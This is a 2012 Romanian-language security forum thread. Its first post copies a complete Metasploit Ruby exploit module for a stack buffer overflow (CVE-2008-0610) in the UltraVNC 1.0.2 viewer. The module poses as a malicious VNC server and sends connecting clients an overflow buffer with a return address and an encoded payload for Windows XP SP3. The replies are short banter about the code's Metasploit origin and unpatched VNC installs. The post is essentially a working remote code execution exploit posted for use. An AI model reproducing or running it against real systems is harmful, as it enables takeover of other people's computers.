The_Arhitect Posted March 27, 2012 Report Posted March 27, 2012 UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow### $Id$##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer def initialize(info = {}) super(update_info(info, 'Name' => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack. }, 'Author' => 'noperand', 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0610' ], [ 'OSVDB', '42840' ], [ 'BID', '27561' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2 ], 'Privileged' => false, 'DisclosureDate' => 'Feb 6 2008', 'DefaultTarget' => 0)) register_options( [ OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ]) ], self.class) end def on_client_connect(client) return if ((p = regenerate_payload(client)) == nil) sploit = rand_text_alpha(1100) # junk, could be more efficient here sploit << "\x00\x04\x00\x00" # value to get around a write sploit << rand_text_alpha(12) # random junk sploit << "\xEB\x06" << make_nops(2) # short relative jump sploit << [target.ret].pack('V') # pop/pop/ret (default is in vncviewer.exe) sploit << payload.encoded=begin We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016"). - These bytes are read directly by a call to ReadExact() with a size of 12. ... if (m_minorVersion == 14 || m_minorVersion == 16) { int size; ReadExact((char *)&size,sizeof(int)); char mytext[1024]; //10k ReadExact(mytext,size); mytext[size]=0; ... If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read. We then append our data.=end sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...") client.put(sploit) handler(client) service.close_client(client) endendSursa: UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow Quote
backdoorhk Posted March 28, 2012 Report Posted March 28, 2012 cred ca exploitul este din metasploit. in fine, mai foloseste cineva versiuni alea de vnc? Quote
backdoor Posted April 2, 2012 Report Posted April 2, 2012 Te-ar mira sa afli cati inca mai folosesc client/server de acum 2-3 ani ... Quote
napoletanii Posted April 2, 2012 Report Posted April 2, 2012 e logic daca vnc`ul nu are autoupdater , dohh , e logica si cealalta chestie "class Metasploit3 < Msf::Exploit::Remote" dohh Quote
backdoor Posted April 18, 2012 Report Posted April 18, 2012 (edited) napo - daca SysAdmin-ul doarme ... cine ai vrea sa updateze vnc-ul ? WINDOWS UPDATE ? DOHH !!!PS: si eu care credeam ca e un Makefile exploit Edited April 18, 2012 by backdoor Quote
